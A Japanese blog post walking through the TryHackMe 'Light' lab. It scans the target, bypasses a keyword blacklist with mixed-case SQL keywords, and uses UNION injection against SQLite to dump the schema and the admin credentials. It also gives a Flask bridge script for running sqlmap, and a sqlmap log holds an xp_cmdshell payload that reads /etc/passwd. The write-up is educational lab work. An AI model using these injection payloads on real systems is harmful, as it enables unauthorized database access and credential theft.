0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

TryHackMe Writeup: Light

0
Last updated at Posted at 2026-05-19

はじめに

この記事は、TryHackMeのwriteupです。
Roomは、Light、Difficulty(難易度)はEasyです。

このRoomでは、Linuxシステムに存在するデータベースをもとに様々なSQLインジェクションに関する回避方法とそのエクスプロイト方法について学ぶことができます。

Recon

Port Scan

Scanned at 2026-05-16 00:20:39 JST for 169s

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 62 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6f:38:bb:3e:06:2e:6a:c6:3e:c9:f8:f1:92:bc:94:f8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMtbQjIvftfWXWpXGcwVZpSYcAs4cw04kuHj2TH+dG+/I78XM6W486DxwA9J/96K0h80VqvkdPu7n251Gmkw1uKVccMcaF4Qe/t/6ANK5lVn0yggcyqIhoR/LZCuVscxFGtutEAM1Eq3vw8huhVSzNP1d/WAh78+hki0vKB/YQhPOmL0KewFsVtQxa5/n+v69/WBlKWep0q4kIAXk0pQTGOtwBeXxamU6ZX84gEYfXquR8Gky+ak+5nVR4ffuaBeKGaSMvQWjieMHt9hHQHHOadxkW0GZhjjFZXIXhUBC4rOromyEfzfWhxkaf/JEP/YkbYirrZd6qmc4SlJjOMneJTNtO2AoRGZasCU6CdIKALw78xAcsCXrIRlZWn3LmtXFTrlFSsXwrNvvui5x7YJJOJfZTK5fEmJ/huVseBYJIOqi8IZaCMpnt6LnDSj//trIScMUqsOtXtgK7rpBhxkt/tRlk6biEjWrTQMIDcMqMtr5oVpk7G1zXecL8uriJD90=
|   256 b7:c3:5e:ee:89:59:8d:c0:e7:13:57:12:bf:20:21:22 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6NNqFr0ByFsjw83XW7eAcmjQSOeCmAUA93Rg9VjQJx4Su7VEsluimV09JInFkvzPQX1r72UqqM66srj3d7QZk=
|   256 1c:e2:a6:46:48:d4:45:6d:ff:b4:ee:33:f6:93:bd:90 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAVV9+4ojd/g7IHyhjVUUDVM0zdf5tSLdRtgZC9ISsF1
1337/tcp open  waste?  syn-ack ttl 62
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     Welcome to the Light database!
|     Please enter your username:
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest: 
|     Welcome to the Light database!
|     Please enter your username: Username not found.
|_    Please enter your username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.99%I=7%D=5/16%Time=6A0739CD%P=x86_64-pc-linux-gnu%r(NU
SF:LL,3B,"Welcome\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20y
SF:our\x20username:\x20")%r(GenericLines,6B,"Welcome\x20to\x20the\x20Light
SF:\x20database!\nPlease\x20enter\x20your\x20username:\x20Username\x20not\
SF:x20found\.\nPlease\x20enter\x20your\x20username:\x20")%r(GetRequest,6B,
SF:"Welcome\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x2
SF:0username:\x20Username\x20not\x20found\.\nPlease\x20enter\x20your\x20us
SF:ername:\x20")%r(HTTPOptions,6B,"Welcome\x20to\x20the\x20Light\x20databa
SF:se!\nPlease\x20enter\x20your\x20username:\x20Username\x20not\x20found\.
SF:\nPlease\x20enter\x20your\x20username:\x20")%r(RTSPRequest,6B,"Welcome\
SF:x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20username
SF::\x20Username\x20not\x20found\.\nPlease\x20enter\x20your\x20username:\x
SF:20")%r(RPCCheck,3B,"Welcome\x20to\x20the\x20Light\x20database!\nPlease\
SF:x20enter\x20your\x20username:\x20")%r(DNSVersionBindReqTCP,3B,"Welcome\
SF:x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20username
SF::\x20")%r(DNSStatusRequestTCP,3B,"Welcome\x20to\x20the\x20Light\x20data
SF:base!\nPlease\x20enter\x20your\x20username:\x20")%r(Help,6B,"Welcome\x2
SF:0to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20username:\
SF:x20Username\x20not\x20found\.\nPlease\x20enter\x20your\x20username:\x20
SF:")%r(SSLSessionReq,3B,"Welcome\x20to\x20the\x20Light\x20database!\nPlea
SF:se\x20enter\x20your\x20username:\x20")%r(TerminalServerCookie,3B,"Welco
SF:me\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20usern
SF:ame:\x20")%r(TLSSessionReq,3B,"Welcome\x20to\x20the\x20Light\x20databas
SF:e!\nPlease\x20enter\x20your\x20username:\x20")%r(Kerberos,3B,"Welcome\x
SF:20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20username:
SF:\x20")%r(SMBProgNeg,3B,"Welcome\x20to\x20the\x20Light\x20database!\nPle
SF:ase\x20enter\x20your\x20username:\x20")%r(X11Probe,3B,"Welcome\x20to\x2
SF:0the\x20Light\x20database!\nPlease\x20enter\x20your\x20username:\x20")%
SF:r(FourOhFourRequest,6B,"Welcome\x20to\x20the\x20Light\x20database!\nPle
SF:ase\x20enter\x20your\x20username:\x20Username\x20not\x20found\.\nPlease
SF:\x20enter\x20your\x20username:\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

上記のポートスキャン結果から調査を行います。

問題文では次のようなことが書いてあります。

I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using nc MACHINE_IP 1337
You can use the username smokey in order to get started.

Note: Please allow the service 2 - 3 minutes to fully start before connecting to it.

このように、smokeyというユーザー名を用いて、nc MACHINE_IP 1337で接続する必要があるそうです。

Scanning

実際に接続を試みます。

┌──(rikuxx㉿kali)-[~]
└─$ nc [target_ip] 1337                                                       
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL

こうなります。

今回、ユーザー名を入れると、パスワードが返ってきます。そのため、バックエンド側でデータベースが動いているかもしれません。

そこで、':などのSQLインジェクションに用いられるペイロードを入力します。

Please enter your username: :
Username not found.
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"

すると、Username not found.からSQL文のエラー構文を吐きました。また、このError: unrecognized token: "''' LIMIT 30"というエラー構文から、SQLiteが裏で動いていることが推測できます。

Exploitation

そこで、様々なSQLインジェクションのペイロードを使用しました。

まず、代表手である' OR '1'='1を使用し、全てtrueを返すのかを調べました。

┌──(rikuxx㉿kali)-[~]
└─$ nc [target_ip] 1337                        
Welcome to the Light database!
Please enter your username: ' OR '1'='1
Password: tF8tj2o94WE4LKC

すると、tF8tj2o94WE4LKCというパスワードを吐きました。しかし、アカウント名がわからないので、何かに使えそうな感じはありません。

また、UNION構文を使用したペイロードも使用しました。

┌──(rikuxx㉿kali)-[~]
└─$ nc 10.49.186.98 1337
Welcome to the Light database!
Please enter your username: ' UNION SELECT 1 '
Ahh there is a word in there I don't like :(
Please enter your username: ' UNION SELECT 1,2 '
Ahh there is a word in there I don't like :(
Please enter your username: ' UNION SELECT 1,2,3 '
Ahh there is a word in there I don't like :(
Please enter your username: 

どうやら、カラムの数も特定できないような感じがします。

困ってきたので、SQLMapを使いたいと思います。しかし、今回の場合、CUI上でデータベースと疎通するため、入力値をセットできません。

そこで、自分の端末でブリッジサーバーを立て、SQLMapを使えるようにしました。

以下がそのスクリプトです。

  • bridge.py
import socket
from flask import Flask, request

app = Flask(__name__)

TARGET_IP = "[target_ip]"
TARGET_PORT = 1337

@app.route("/")
def proxy():
    username = request.args.get('u', '')
    
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((TARGET_IP, TARGET_PORT))
        # 最初のメッセージ(Welcome...)を読み飛ばす
        s.recv(1024) 
        # ユーザー名を送信
        s.sendall(username.encode() + b"\n")
        # レスポンスを受け取る
        response = s.recv(1024).decode(errors='ignore')
        
    return response

if __name__ == "__main__":
    app.run(port=8080)

以下のように実行し、検証します。

┌──(rikuxx㉿kali)-[~/tryhackme/Light]
└─$ python3 bridge.py          
 * Serving Flask app 'bridge'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:8080
Press CTRL+C to quit
┌──(rikuxx㉿kali)-[~/tryhackme/Light]
└─$ sqlmap -u "http://127.0.0.1:8080/?u=*" --batch --dbms=sqlite --level 5 --risk 3
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.10.3#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:35:42 /2026-05-16/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[00:35:42] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[00:35:42] [INFO] testing connection to the target URL
[00:35:43] [INFO] checking if the target is protected by some kind of WAF/IPS
....
....
[00:42:42] [WARNING] URI parameter '#1*' does not seem to be injectable
[00:42:42] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[00:42:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 177 times

[*] ending @ 00:42:42 /2026-05-16/

ただ、検証に失敗しているようです。つまり、今回はSQLMapを使わずに、自力でSQLインジェクションを悪用する必要があります。

ここでいくつかのアプローチを考える必要があります。

SQLiteのスキーマ情報を抜けるのかという話

まず、SQLスキーマ情報がなければ、テーブル情報も抜きにくいです。そのため、スキーマ情報を抜きたいところです。

SQLiteでは、sqlite_mastersqlite_schemaなどでスキーマ情報を抜くことが可能です。

ただ、今回、' UNION SELECT 1 'などのダイレクトなSELECTUNION構文を使用すると、エラーとして返されてしまいます。ただ、これは同時に、エラーとして処理される際にブラックリスト方式で弾かれていることも意味します。

SQLインジェクション脆弱性のバイパス

ここで、ある一つの一つの仮説を考えます。

SQLiteでは、データベース照合順序という概念から大小の文字を区別しない検索方式が取られている可能性があります。これは SQLiteに限らず、MySQLやPostgreSQLなどでも同じ概念が存在します。

このことから、もしかしたらブラックリスト上では大文字のSELECTUNIONは制限されていますが、sElEcTUniOnなどの大小文字が混合された文字列はバイパスできるかもしれません。

実際にバイパスできるかどうか検証します。

┌──(rikuxx㉿kali)-[~/tryhackme/Light]
└─$ nc 10.49.154.231 1337
Welcome to the Light database!
Please enter your username: ' OR (sElEcT 1)=1 AND '1'='1
Password: tF8tj2o94WE4LKC
Please enter your username: 

なんとバイパスされ、' OR '1'='1の時と同じ出力をしました。

このことから、さらに調査を進めます。

ただ、この先がよくわからなかったので、他のwriteupを見ました。

どうやら、以下のペイロードを使用する必要があります。

' UniOn SeLeCt group_concat(sql) FROM sqlite_master '

このペイロードは、以下のペイロード集からUNION構文を使用し、スキーマ情報を抜き取るペイロードを作成するようです。

 
実際に検証します。

Please enter your username: ' UniOn SeLeCt group_concat(sql) FROM sqlite_master '
Password: CREATE TABLE usertable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER),CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)
Please enter your username: 

すると、usertableadmintableというテーブルを抜き取ることに成功しました。おそらく、このデータベースにはこの2つのテーブルしかなさそうです。

このことから、admintableに管理者アカウントの情報がありそうなので、usernameというカラム名がありそうなので、以下を実行しました。

Please enter your username: ' UniOn SeLeCt group_concat(username) FROM admintable '
Password: XXXXXXXXXXXXX,flag

結果として、管理者のユーザー名を取得できました。

What is the admin username?
Answer: XXXXXXXXXXXXX

 
また、発見したユーザー名を使用し、パスワードカラムの中身を見ました。

Please enter your username: ' UniOn SeLeCt password FROM admintable WHERE username='XXXXXXXXXXXXX
Password: YYYYYYYYYYYYYYYYY

よって、パスワードもリークすることができました。

What is the password to the username mentioned in question 1?
Answer: YYYYYYYYYYYYYYYYY

 
さらに、フラグもリークします。

Please enter your username: ' UniOn SeLeCt password FROM admintable WHERE username='flag
Password: THM{ZZZZZZZZZZZZZZZZZZZZZZ}

よって、フラグを取得することができました。

What is the flag?
Answer: THM{ZZZZZZZZZZZZZZZZZZZZZZ}

余談

┌──(rikuxx㉿kali)-[~/tryhackme/Light]
└─$ python3 bridge.py          
 * Serving Flask app 'bridge'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:8080
Press CTRL+C to quit
127.0.0.1 - - [16/May/2026 00:35:43] "GET /?u= HTTP/1.1" 200 -
127.0.0.1 - - [16/May/2026 00:35:43] "GET /?u=&jcwr=2937%20AND%201%3D1%20UNION%20ALL%20SELECT%201,NULL,'<script>alert("XSS")</script>',table_name%20FROM%20information_schema.tables%20WHERE%202>1--/**/;%20EXEC%20xp_cmdshell('cat%20../../../etc/passwd')%23 HTTP/1.1" 200 -
127.0.0.1 - - [16/May/2026 00:35:44] "GET /?u= HTTP/1.1" 200 -
127.0.0.1 - - [16/May/2026 00:35:44] "GET /?u=7368 HTTP/1.1" 200 -
127.0.0.1 - - [16/May/2026 00:35:45] "GET /?u=(.,.,.()'" HTTP/1.1" 200 -
127.0.0.1 - - [16/May/2026 00:35:46] "GET /?u='nqbpNv<'">WnMBrB HTTP/1.1" 200 
.......
.......

ブリッジサーバー上でSQLMapはこのように検証しているようです。これだともしSOCなどの組織が監視しているようなところだったら、攻撃していることが丸見えになることがわかります。怖いですね😱

終わりに

今回のラボでは、CUI上に制限されたSQLインジェクションのラボを解きました。

Web問はそこそこできるぐらいかと思っていましたが、案外、ムズカった印象です。また、SQLインジェクション対策として、ルールベースのブラックリスト方式の制限は、データベースの性質によりバイパスできることは良い学びになりました。

Tipsは特になさそうなので、今回はこれで切り上げます。

ご参考になると幸いです。

参考文献

以下を参考にしました。

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?